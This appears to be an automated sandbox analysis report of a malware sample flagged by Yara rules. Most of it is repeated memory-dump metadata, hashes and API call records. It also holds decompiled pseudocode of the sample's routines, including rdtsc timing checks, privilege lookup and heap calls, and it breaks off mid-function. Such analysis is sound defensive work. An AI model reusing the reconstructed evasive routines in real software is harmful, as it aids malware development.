                                                                                                                                                    • Opcode Fuzzy Hash: 7ba0f55f1fd72216c7a5d20d06c619025faf51988f765d7a98e58a350c3ee9ce
                                                                                                                                                    • Instruction Fuzzy Hash: 97B012721005C4C7E30D9714D906B8F7210FB80F00F00893AA40782861DB789A2CE45A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction ID: fe3894545e6d7ff35e2d014bd1b41c27fc981d7cba2425ddd0908e3dd582fca9
                                                                                                                                                    • Opcode Fuzzy Hash: 9be46aa23fef74e92aa7046bff19981ac9c85faae99787f44d25aa72a03369f2
                                                                                                                                                    • Instruction Fuzzy Hash: 17B01272100544C7E3099714D906B8B7210FB80F00F008E3AA04782991DB78992DE446
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction ID: 41c45e5f09b42d6e0ddb2dc3248e04f5cc5ab51982cd1fe1d329002f24c15819
                                                                                                                                                    • Opcode Fuzzy Hash: c03c3f025ade335fb37a3227fdd9bdec0ce29723ea859b950f344d641557639d
                                                                                                                                                    • Instruction Fuzzy Hash: 14B01272104580C7E349AB14D90AB5BB210FB90F00F40893AE04B81850DA3C992CC546
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    • Opcode ID: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction ID: 69502d12976c3e383ebc8ea250e6427301c1fd9f045747c541fd94b810363c34
                                                                                                                                                    • Opcode Fuzzy Hash: b6c387d48eb785842166a0bd4fb6c7cae32a88c5d36fa47243e2a3f83643301c
                                                                                                                                                    • Instruction Fuzzy Hash: 3AB01277105940C7E349A714DD0AB5B7220FBC0F01F00893AE00781890DA38993CC54A
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    • Associated: 00000007.00000002.2246630642.0000000000900000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246724865.00000000009F0000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246731757.0000000000A00000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246739338.0000000000A04000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246746087.0000000000A07000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246752065.0000000000A10000.00000040.00000001.sdmp Download File
                                                                                                                                                    • Associated: 00000007.00000002.2246784838.0000000000A70000.00000040.00000001.sdmp Download File
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246637446.0000000000910000.00000040.00000001.sdmp, Offset: 00900000, based on PE: true
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: InitializeThunk
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 2994545307-0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 93%
                                                                                                                                                    			E004088C0(intOrPtr _a4) {
                                                                                                                                                    				intOrPtr _v8;
                                                                                                                                                    				char _v24;
                                                                                                                                                    				char _v284;
                                                                                                                                                    				char _v804;
                                                                                                                                                    				char _v840;
                                                                                                                                                    				void* _t24;
                                                                                                                                                    				void* _t31;
                                                                                                                                                    				void* _t33;
                                                                                                                                                    				void* _t34;
                                                                                                                                                    				void* _t39;
                                                                                                                                                    				void* _t50;
                                                                                                                                                    				intOrPtr _t52;
                                                                                                                                                    				void* _t53;
                                                                                                                                                    				void* _t54;
                                                                                                                                                    				void* _t55;
                                                                                                                                                    				void* _t56;
                                                                                                                                                    
                                                                                                                                                    				_t52 = _a4;
                                                                                                                                                    				_t39 = 0; // executed
                                                                                                                                                    				_t24 = E00406E10(_t52,  &_v24); // executed
                                                                                                                                                    				_t54 = _t53 + 8;
                                                                                                                                                    				if(_t24 != 0) {
                                                                                                                                                    					E00407020( &_v24,  &_v840);
                                                                                                                                                    					_t55 = _t54 + 8;
                                                                                                                                                    					do {
                                                                                                                                                    						E00419CE0( &_v284, 0x104);
                                                                                                                                                    						E0041A350( &_v284,  &_v804);
                                                                                                                                                    						_t56 = _t55 + 0x10;
                                                                                                                                                    						_t50 = 0x4f;
                                                                                                                                                    						while(1) {
                                                                                                                                                    							_t31 = E00413DE0(E00413D80(_t52, _t50),  &_v284);
                                                                                                                                                    							_t56 = _t56 + 0x10;
                                                                                                                                                    							if(_t31 != 0) {
                                                                                                                                                    								break;
                                                                                                                                                    							}
                                                                                                                                                    							_t50 = _t50 + 1;
                                                                                                                                                    							if(_t50 <= 0x62) {
                                                                                                                                                    								continue;
                                                                                                                                                    							} else {
                                                                                                                                                    							}
                                                                                                                                                    							goto L8;
                                                                                                                                                    						}
                                                                                                                                                    						_t9 = _t52 + 0x14; // 0xffffe1a5
                                                                                                                                                    						 *(_t52 + 0x474) =  *(_t52 + 0x474) ^  *_t9;
                                                                                                                                                    						_t39 = 1;
                                                                                                                                                    						L8:
                                                                                                                                                    						_t33 = E00407050( &_v24,  &_v840);
                                                                                                                                                    						_t55 = _t56 + 8;
                                                                                                                                                    					} while (_t33 != 0 && _t39 == 0);
                                                                                                                                                    					_t34 = E004070D0(_t52,  &_v24); // executed
                                                                                                                                                    					if(_t39 == 0) {
                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                    						asm("rdtsc");
                                                                                                                                                    						_v8 = _t34 - 0 + _t34;
                                                                                                                                                    						 *((intOrPtr*)(_t52 + 0x55c)) =  *((intOrPtr*)(_t52 + 0x55c)) + 0xffffffba;
                                                                                                                                                    					}
                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x31)) =  *((intOrPtr*)(_t52 + 0x31)) + _t39;
                                                                                                                                                    					_t20 = _t52 + 0x31; // 0x5608758b
                                                                                                                                                    					 *((intOrPtr*)(_t52 + 0x32)) =  *((intOrPtr*)(_t52 + 0x32)) +  *_t20 + 1;
                                                                                                                                                    					return 1;
                                                                                                                                                    				} else {
                                                                                                                                                    					return _t24;
                                                                                                                                                    				}
                                                                                                                                                    			}




















                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID:
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID:
                                                                                                                                                    • Opcode ID: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction ID: 4c2b1df36aa7b29bb0fae7ecfb93cd688d28708cc461f9fe29ca3c1f3973371e
                                                                                                                                                    • Opcode Fuzzy Hash: 67bb4e2207c22d687f6acc024d55c7e0c161e5d4599185de851a30ee67947c6b
                                                                                                                                                    • Instruction Fuzzy Hash: EC213CB2D442085BCB10E6649D42BFF73AC9B50304F04057FF989A3181FA38BB498BA7
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E00418466(signed int __ebx, void* _a4) {
                                                                                                                                                    				void* _v0;
                                                                                                                                                    				void* _v4;
                                                                                                                                                    				signed int _t13;
                                                                                                                                                    
                                                                                                                                                    				asm("fsubrp st3, st0");
                                                                                                                                                    				_push(0x74);
                                                                                                                                                    				_t13 = __ebx * 0x74;
                                                                                                                                                    				if (_t13 <= 0) goto L3;
                                                                                                                                                    			}







                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5A
                                                                                                                                                    • API String ID: 1279760036-1617645808
                                                                                                                                                    • Opcode ID: e5ff93ddb35fed0d7f286053971ed91a1ee32018779d89d2803b508e57d8f9db
                                                                                                                                                    • Instruction ID: 9207933e5bff9b50245d89a6aef777533999b706f6573a0da11b195f706207f6
                                                                                                                                                    • Opcode Fuzzy Hash: e5ff93ddb35fed0d7f286053971ed91a1ee32018779d89d2803b508e57d8f9db
                                                                                                                                                    • Instruction Fuzzy Hash: 5FF0A7B26002146BD724EF94DC81EE7736DEFC4390F10855EF94C5B241DA31E90587E0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 37%
                                                                                                                                                    			E004184A0(intOrPtr _a4, char _a8, intOrPtr _a12, void* _a16) {
                                                                                                                                                    				intOrPtr _t9;
                                                                                                                                                    				void* _t10;
                                                                                                                                                    				void* _t12;
                                                                                                                                                    
                                                                                                                                                    				E00418DD0(_a4, _a4 + 0xc70,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x34);
                                                                                                                                                    				_t9 = _a12;
                                                                                                                                                    				_t6 =  &_a8; // 0x413526
                                                                                                                                                    				_t12 =  *_t6;
                                                                                                                                                    				asm("les edx, [edx+edx*2]");
                                                                                                                                                    				_push(_t9);
                                                                                                                                                    				_t10 = RtlAllocateHeap(_t12); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}







                                                                                                                                                    APIs
                                                                                                                                                    • RtlAllocateHeap.NTDLL(&5A,?,00413C9F,00413C9F,?,00413526,?,?,?,?,?,00000000,00408B03,?), ref: 004184CD
                                                                                                                                                    Strings
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: AllocateHeap
                                                                                                                                                    • String ID: &5A
                                                                                                                                                    • API String ID: 1279760036-1617645808
                                                                                                                                                    • Opcode ID: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction ID: 6eed1dfa6fdd4b996c8079955bb5808ea645f65af4e2973490dba1d49a230398
                                                                                                                                                    • Opcode Fuzzy Hash: 5b685ba00e4f3e285a347290f69675979fbe5b3df3c61f88542a29b4b9d62cf4
                                                                                                                                                    • Instruction Fuzzy Hash: 94E012B1200208ABDB14EF99DC41EA777ACAF88654F118559BA085B282CA30F9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 82%
                                                                                                                                                    			E00407270(void* __eflags, intOrPtr _a4, long _a8) {
                                                                                                                                                    				char _v67;
                                                                                                                                                    				char _v68;
                                                                                                                                                    				void* _t12;
                                                                                                                                                    				intOrPtr* _t13;
                                                                                                                                                    				int _t14;
                                                                                                                                                    				long _t21;
                                                                                                                                                    				intOrPtr* _t25;
                                                                                                                                                    				void* _t26;
                                                                                                                                                    				void* _t30;
                                                                                                                                                    
                                                                                                                                                    				_t30 = __eflags;
                                                                                                                                                    				_v68 = 0;
                                                                                                                                                    				E00419D30( &_v67, 0, 0x3f);
                                                                                                                                                    				E0041A910( &_v68, 3);
                                                                                                                                                    				_t12 = E00409B30(_t30, _a4 + 0x1c,  &_v68); // executed
                                                                                                                                                    				_t13 = E00413E40(_t12, _a4 + 0x1c, _t12, 0, 0, 0xc4e7b6d6);
                                                                                                                                                    				_t25 = _t13;
                                                                                                                                                    				if(_t25 != 0) {
                                                                                                                                                    					_t21 = _a8;
                                                                                                                                                    					_t14 = PostThreadMessageW(_t21, 0x111, 0, 0); // executed
                                                                                                                                                    					_t32 = _t14;
                                                                                                                                                    					if(_t14 == 0) {
                                                                                                                                                    						_t14 =  *_t25(_t21, 0x8003, _t26 + (E00409290(_t32, 1, 8) & 0x000000ff) - 0x40, _t14);
                                                                                                                                                    					}
                                                                                                                                                    					return _t14;
                                                                                                                                                    				}
                                                                                                                                                    				return _t13;
                                                                                                                                                    			}













                                                                                                                                                    APIs
                                                                                                                                                    • PostThreadMessageW.USER32(?,00000111,00000000,00000000,?), ref: 004072CA
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: MessagePostThread
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 1836367815-0
                                                                                                                                                    • Opcode ID: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                    • Instruction ID: 34c16447600cfe3bfc53875ba7b31b7f06d917fb68e10caa6e1b72df1d8a1719
                                                                                                                                                    • Opcode Fuzzy Hash: b429a28fbdaf8ade12dc58879e230a39c476b9a6de75f7f862eb8cc2ee54f132
                                                                                                                                                    • Instruction Fuzzy Hash: 9901D431A8022877E720A6959C03FFE776C5B00B55F05046EFF04BA1C2E6A87A0542EA
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: a383c19f0c3e3c2feb5d59b8ee80593fa1d9c14dacdb5dde747d696b7fc5ead1
                                                                                                                                                    • Instruction ID: ff36e9b11114d1afdb3a3bd1ceb29c80d8feb899446d4ed73710a8a8776a217a
                                                                                                                                                    • Opcode Fuzzy Hash: a383c19f0c3e3c2feb5d59b8ee80593fa1d9c14dacdb5dde747d696b7fc5ead1
                                                                                                                                                    • Instruction Fuzzy Hash: 96F0C275201204AFDB10DF69DC81CE777A8EF88354B01864EF84C97253D635E915CBA0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 1007595e98b949c926a59409bf861663300e264e347bdfd6eb6e884888ba52a4
                                                                                                                                                    • Instruction ID: 42882972ca30b6fac69cf671eea72bd8fc0ce937952c153f9563551603e41dd5
                                                                                                                                                    • Opcode Fuzzy Hash: 1007595e98b949c926a59409bf861663300e264e347bdfd6eb6e884888ba52a4
                                                                                                                                                    • Instruction Fuzzy Hash: FFF0E5B52002146FDB10DF54DC80FEB37A9EF89350F018055FE485F281D935E8018BB4
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004184DF(void* _a4, long _a8, void* _a12) {
                                                                                                                                                    				intOrPtr _v0;
                                                                                                                                                    				char _t10;
                                                                                                                                                    
                                                                                                                                                    				_t7 = _v0;
                                                                                                                                                    				_t3 = _t7 + 0xc74; // 0xc74
                                                                                                                                                    				E00418DD0(_v0, _t3,  *((intOrPtr*)(_v0 + 0x10)), 0, 0x35);
                                                                                                                                                    				_t10 = RtlFreeHeap(_a4, _a8, _a12); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}






                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: b5b276ecc2cd6708aeab09043ff434cd78b90f757783ee2c3e127b5fa2d59790
                                                                                                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                                                    • Opcode Fuzzy Hash: b5b276ecc2cd6708aeab09043ff434cd78b90f757783ee2c3e127b5fa2d59790
                                                                                                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E004184E0(intOrPtr _a4, void* _a8, long _a12, void* _a16) {
                                                                                                                                                    				char _t10;
                                                                                                                                                    
                                                                                                                                                    				_t3 = _a4 + 0xc74; // 0xc74
                                                                                                                                                    				E00418DD0(_a4, _t3,  *((intOrPtr*)(_a4 + 0x10)), 0, 0x35);
                                                                                                                                                    				_t10 = RtlFreeHeap(_a8, _a12, _a16); // executed
                                                                                                                                                    				return _t10;
                                                                                                                                                    			}





                                                                                                                                                    APIs
                                                                                                                                                    • RtlFreeHeap.NTDLL(00000060,00408B03,?,?,00408B03,00000060,00000000,00000000,?,?,00408B03,?,00000000), ref: 0041850D
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: FreeHeap
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3298025750-0
                                                                                                                                                    • Opcode ID: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction ID: 3ff41463f96ddcb9b979ffb1c010e7f29050f08b507ceaebb1b5cb1da4dac703
                                                                                                                                                    • Opcode Fuzzy Hash: c73a038728a0c461ae7389dd2c659cb336152b082840842379cc140023e4f07c
                                                                                                                                                    • Instruction Fuzzy Hash: A0E01AB12002086BD714DF59DC45EA777ACAF88750F014559B90857281C630E9108AB0
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    APIs
                                                                                                                                                    • LookupPrivilegeValueW.ADVAPI32(00000000,00000041,0040CFB2,0040CFB2,00000041,00000000,?,00408B75), ref: 00418670
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: LookupPrivilegeValue
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 3899507212-0
                                                                                                                                                    • Opcode ID: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction ID: efef6450e86da2b54d6b49fe3c32415886d6c73e427b64be19593e81b86a73e4
                                                                                                                                                    • Opcode Fuzzy Hash: 6066231f07dbbfb97dda43844c8c8cc76a5ad0e3334111b5d8a4297bdf0bdfe7
                                                                                                                                                    • Instruction Fuzzy Hash: 1CE01AB12002086BDB10DF49DC85EE737ADAF88650F018159BA0857281C934E8108BF5
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    C-Code - Quality: 100%
                                                                                                                                                    			E00418520(intOrPtr _a4, int _a8) {
                                                                                                                                                    
                                                                                                                                                    				_t5 = _a4;
                                                                                                                                                    				E00418DD0(_a4, _a4 + 0xc7c,  *((intOrPtr*)(_t5 + 0xa14)), 0, 0x36);
                                                                                                                                                    				ExitProcess(_a8);
                                                                                                                                                    			}




                                                                                                                                                    APIs
                                                                                                                                                    • ExitProcess.KERNELBASE(?,?,00000000,?,?,?), ref: 00418548
                                                                                                                                                    Memory Dump Source
                                                                                                                                                    • Source File: 00000007.00000002.2246257528.0000000000400000.00000040.00000001.sdmp, Offset: 00400000, based on PE: true
                                                                                                                                                    Yara matches
                                                                                                                                                    Similarity
                                                                                                                                                    • API ID: ExitProcess
                                                                                                                                                    • String ID:
                                                                                                                                                    • API String ID: 621844428-0
                                                                                                                                                    • Opcode ID: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction ID: 0124507ddd2f9c2d15af78755faa13525d8eeaf852c7518965348cd9efebe569
                                                                                                                                                    • Opcode Fuzzy Hash: caa18f4ccbf82a939ed7a560578cfa8cb4ed60065234b72d20cd43f227523b36
                                                                                                                                                    • Instruction Fuzzy Hash: A8D012716003187BD620DF99DC85FD7779CDF48790F018169BA1C5B281C571BA0086E1
                                                                                                                                                    Uniqueness

                                                                                                                                                    Uniqueness Score: -1.00%

                                                                                                                                                    Non-executed Functions

                                                                                                                                                    C-Code - Quality: 55%
                                                                                                                                                    			E0094C5F0(intOrPtr _a4, char _a8, signed short _a12, intOrPtr _a16, intOrPtr _a20) {
                                                                                                                                                    				signed int _v8;
                                                                                                                                                    				char _v544;
                                                                                                                                                    				char _v1064;
                                                                                                                                                    				char _v1068;
                                                                                                                                                    				char _v1069;
                                                                                                                                                    				signed short* _v1076;
                                                                                                                                                    				signed short _v1080;
                                                                                                                                                    				intOrPtr _v1084;
                                                                                                                                                    				signed short _v1086;
                                                                                                                                                    				char _v1088;
                                                                                                                                                    				char _v1092;
                                                                                                                                                    				signed short _v1096;
                                                                                                                                                    				char _v1100;
                                                                                                                                                    				char* _v1104;
                                                                                                                                                    				short _v1106;
                                                                                                                                                    				char _v1108;
                                                                                                                                                    				char _v1111;
                                                                                                                                                    				char _v1112;
                                                                                                                                                    				signed short _v1116;
                                                                                                                                                    				char _v1120;
                                                                                                                                                    				intOrPtr _v1124;
                                                                                                                                                    				short _v1126;
                                                                                                                                                    				char _v1128;
                                                                                                                                                    				intOrPtr _v1132;
                                                                                                                                                    				intOrPtr _v1136;
                                                                                                                                                    				intOrPtr _v1140;
                                                                                                                                                    				char _v1144;
                                                                                                                                                    				intOrPtr _v1148;
                                                                                                                                                    				short _v1150;
                                                                                                                                                    				char _v1152;
                                                                                                                                                    				char* _v1156;
                                                                                                                                                    				short _v1158;
                                                                                                                                                    				char _v1160;
                                                                                                                                                    				intOrPtr _v1164;
                                                                                                                                                    				intOrPtr _v1172;
                                                                                                                                                    				intOrPtr _v1176;
                                                                                                                                                    				char _v1180;
                                                                                                                                                    				intOrPtr _v1184;
                                                                                                                                                    				intOrPtr _v1188;
                                                                                                                                                    				intOrPtr _v1192;
                                                                                                                                                    				char* _v1196;
                                                                                                                                                    				intOrPtr _v1200;
                                                                                                                                                    				char _v1204;
                                                                                                                                                    				char _v1212;
                                                                                                                                                    				void* __ebx;
                                                                                                                                                    				void* __edi;
                                                                                                                                                    				void* __esi;
                                                                                                                                                    				signed int _t173;
                                                                                                                                                    				intOrPtr _t175;
                                                                                                                                                    				void* _t191;
                                                                                                                                                    				void* _t193;
                                                                                                                                                    				intOrPtr _t200;
                                                                                                                                                    				char _t215;
                                                                                                                                                    				void* _t226;
                                                                                                                                                    				signed short _t250;
                                                                                                                                                    				void* _t284;
                                                                                                                                                    				signed short _t286;
                                                                                                                                                    				unsigned int _t292;
